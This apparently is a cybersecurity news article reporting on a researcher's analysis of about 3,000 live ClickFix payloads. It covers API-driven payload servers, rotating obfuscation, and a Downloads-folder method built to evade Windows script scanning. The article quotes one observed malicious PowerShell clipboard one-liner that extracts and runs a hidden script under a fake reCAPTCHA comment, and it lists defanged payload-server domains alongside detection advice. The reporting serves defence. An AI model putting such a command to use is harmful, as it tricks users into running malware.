Close Menu
    What's Hot

    Are Europe’s extreme summers the new normal? What the science says | Weather

    Tibetan Activist Sets Self on Fire Outside U.N. in Protest Against China

    EU Politicians Investigated Pegasus Spyware. Then It Ended Up on One of Their Phones

    Facebook X (Twitter) Instagram
    Trending
    • Are Europe’s extreme summers the new normal? What the science says | Weather
    • Tibetan Activist Sets Self on Fire Outside U.N. in Protest Against China
    • EU Politicians Investigated Pegasus Spyware. Then It Ended Up on One of Their Phones
    • You’re probably ignoring the most important number in your company
    • Politician who investigated spyware abuses had his phone hacked with Pegasus spyware
    • Strait of Hormuz transits increase as US-Iran ceasefire holds
    • Why the ‘oil price’ isn’t always the oil price
    • Magic Weekend: Matt Peet stands by ‘loss of identity’ comments ahead of Wigan Warriors clash with St Helens | Rugby League News
    interluknewsinterluknews
    • Home
    • Business
      • Corporate News
      • Industry Insights
      • Startups & Entrepreneurship
      • Technology & Innovation
    • Economy
      • Economic Policy
      • Financial Analysis
      • Inflation & Interest Rates
      • Trade & Markets
    • Global
      • Conflicts & Security
      • Diplomacy
      • Global Trends
      • International Affairs
    • Lifestyle
      • Fashion
      • Food & Dining
      • Personal Development
      • Travel
    • Opinion
      • Columns
      • Editorials
      • Expert Opinions
      • Reader Voices
    • More
      • Politics
        • Elections
        • Government & Policy
        • International Relations
        • Political Analysis
      • Sports
        • Cricket
        • Football / Soccer
        • International Sports
        • Local Sports
      • Technology
        • Artificial Intelligence
        • Cybersecurity
        • Gadgets & Reviews
        • Tech News
      • South Africa News
    Facebook X (Twitter) Instagram
    interluknewsinterluknews
    Cybersecurity

    Researcher Analyzes 3,000 Live ClickFix Payloads, Exposing API-Driven Malware Delivery

    adminBy adminJuly 3, 2026No Comments5 Mins Read
    Share Facebook Twitter Pinterest Copy Link Telegram LinkedIn Tumblr Email
    Researcher Analyzes 3,000 Live ClickFix Payloads, Exposing API-Driven Malware Delivery
    Share
    Facebook Twitter LinkedIn Pinterest Email

    Researcher Analyzes 3,000 Live ClickFix Payloads, Exposing API-Driven Malware Delivery

    ClickFix, the trick that fools people into running malware by hand, has quietly grown a back office.

    New research shows the malicious commands behind its fake “prove you’re human” pages are now handed out by API-driven servers that give each visitor the same malware in a different disguise. The same research also turned up a new delivery method built to slip past Windows’ script scanning.

    Security researcher Bert-Jan Pals took apart several ClickFix platforms and analyzed roughly 3,000 payloads from live campaigns. He presented the findings at OrangeCon in early June and published the details on June 30.

    ClickFix is simple by design. A booby-trapped page shows a fake CAPTCHA or error, hidden JavaScript drops a command into your clipboard, and the page tells you to press a key combo, paste, and hit Enter. You run the malware yourself.

    There’s usually no exploit at the first step and often no file for traditional antivirus to flag, so conventional email and endpoint controls have less to catch.

    It works well enough that ESET measured a 517% jump from late 2024 into the first half of 2025, and Microsoft’s 2025 Digital Defense Report put it at 47% of the initial-access cases seen by its Defender Experts team.

    Cybersecurity

    The technique now has its own entry in MITRE ATT&CK, T1204.004.

    Payloads made to order

    The new part is how the payloads are produced. Pals found the pages pulling their commands from backend servers that work like an on-demand service: they take requests, check an access token, log the caller, and return a freshly scrambled command each time.

    He asked one server for 100 payloads and got 100 different ones, wrapped in a rotating mix of Base64, AES, TripleDES, Rijndael, and Deflate. Strip the wrapping and, at least for now, they all unpack to the same script, which runs in memory through a PowerShell runspace.

    The disguise is disposable; the malware under it is not, though Pals warns the core payload will likely start changing per victim before long. The same platform serves lures in 25 languages and matches the command to the visitor’s operating system, with macOS versions running alongside Windows.

    The “as-a-service” label is not just branding. ESET has tracked criminals selling ready-made ClickFix builders to other attackers. Pals found a parallel commercialization one layer deeper, in how each payload is churned out on request.

    A quieter way in: the Downloads-folder method

    The second finding is a direct answer to defenders who watch the clipboard. Instead of copying a malicious command, the newer pages copy a harmless-looking one.

    The page quietly downloads a file to the Downloads folder, and the clipboard gets a short “orchestrator” line that moves that file, unpacks it, and runs the script inside. Because the pasted line is only that orchestrator and not the payload itself, it is built to slide past AMSI, the Windows feature that lets antivirus scan scripts before they run. The bad code sits in the downloaded file, off to the side. The observed clipboard line looked like this:

    powershell -C “$t=$env:TMP;Move-Item \”$HOME\Downloads\tmp.zip\” \”$t\7947.zip\”;tar -xf \”$t\7947.zip\” -C \”$t\”;conhost –headless powershell -ExecutionPolicy Bypass -File \”$t\tmp.ps1\” # \”* I am not a robot reCAPTCHA Verification ID:7947 *\””

    Execution has drifted toward stealth as well. The original 2024 lure told people to press Windows+R and paste into the Run box. A newer version, common through 2025 and into 2026, points them to Windows+X and the Windows Terminal instead. Terminal use looks more ordinary, and unlike the Run box, it leaves no trace in the RunMRU registry key that investigators normally check.

    ClickFix stopped being a criminals-only tool a while ago. Proofpoint tied state-backed groups from Russia, Iran, and North Korea, including APT28, MuddyWater, and Kimsuky, to campaigns that dropped ClickFix into their existing infection chains, and North Korean crews built a fake-job “ClickFake Interview” version to hit cryptocurrency workers.

    Cybersecurity

    The trick has spawned named relatives such as FileFix and DownloadFix that lean on other trusted Windows tools. The scale is not theoretical either: security firm Expel found one ClearFake wave that likely infected as many as 147,521 systems since late August 2025.

    What defenders should watch

    The defensive lesson has not changed. The details have. The dependable signals are process chains, not clipboard text: explorer.exe or WindowsTerminal.exe launching powershell.exe, cmd.exe, or msiexec.exe and reaching out to the network right after.

    Those were the most common launchers in Pals’ data, with PowerShell and cmd tied at about 39% each and msiexec close behind at 34%.

    Behavioral EDR, application-control rules that limit which programs can call script interpreters, and plain user guidance (“never paste a command you were told to run into the Run box or a terminal”) all still hold. The Downloads-folder method adds one more thing to hunt: an innocent-looking one-liner that touches the Downloads folder and then spawns a hidden PowerShell.

    Pals also listed three payload servers seen during the research:

    • comicstar[.]lat
    • babybon[.]cfd
    • merkantalolol[.]asia

    A connection to one of these does not prove infection. It means a command was most likely placed in someone’s clipboard.

    Pals’ verdict on the technique is blunt: “ClickFix is here to stay.” The pattern across his research is that ClickFix shifts the moment defenders catch up, and the move from one-off scripts to on-demand payload servers is what keeps that adaptation cheap to repeat.

    The next thing worth watching is whether the malware itself, not just its wrapper, starts changing from one victim to the next.

    analyzes APIDriven ClickFix Delivery Exposing live Malware Payloads researcher
    Follow on Google News Follow on Flipboard
    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email Copy Link
    Previous ArticleMapping Iran’s Ali Khamenei funeral: Where mourners will gather each day | US-Israel war on Iran News
    Next Article Magic Weekend: Matt Peet stands by ‘loss of identity’ comments ahead of Wigan Warriors clash with St Helens | Rugby League News
    admin
    • Website

    Related Posts

    Microsoft Accelerates Post-Quantum Cryptography Shift to 2029

    July 3, 2026

    The European sports host with the most – Live Updates

    July 3, 2026

    AI-Generated Browser Ransomware Abuses Chromium API on Windows, Linux, macOS, Android

    July 3, 2026
    Leave A Reply Cancel Reply

    Demo
    Latest Posts

    Are Europe’s extreme summers the new normal? What the science says | Weather

    Tibetan Activist Sets Self on Fire Outside U.N. in Protest Against China

    EU Politicians Investigated Pegasus Spyware. Then It Ended Up on One of Their Phones

    You’re probably ignoring the most important number in your company

    Latest Posts

    Subscribe to News

    Get the latest sports news from NewsSite about world, sports and politics.

    Advertisement
    Demo

    We are a digital news platform delivering timely, accurate, and insightful coverage of politics, global affairs, business, economy, sports, and more. Our mission is to keep readers informed with reliable news, clear analysis, and stories that truly matter.
    We're social. Connect with us:

    Facebook X (Twitter) Instagram Pinterest YouTube

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    Type above and press Enter to search. Press Esc to cancel.

    Powered by
    ...
    ►
    Necessary cookies enable essential site features like secure log-ins and consent preference adjustments. They do not store personal data.
    None
    ►
    Functional cookies support features like content sharing on social media, collecting feedback, and enabling third-party tools.
    None
    ►
    Analytical cookies track visitor interactions, providing insights on metrics like visitor count, bounce rate, and traffic sources.
    None
    ►
    Advertisement cookies deliver personalized ads based on your previous visits and analyze the effectiveness of ad campaigns.
    None
    ►
    Unclassified cookies are cookies that we are in the process of classifying, together with the providers of individual cookies.
    None
    Powered by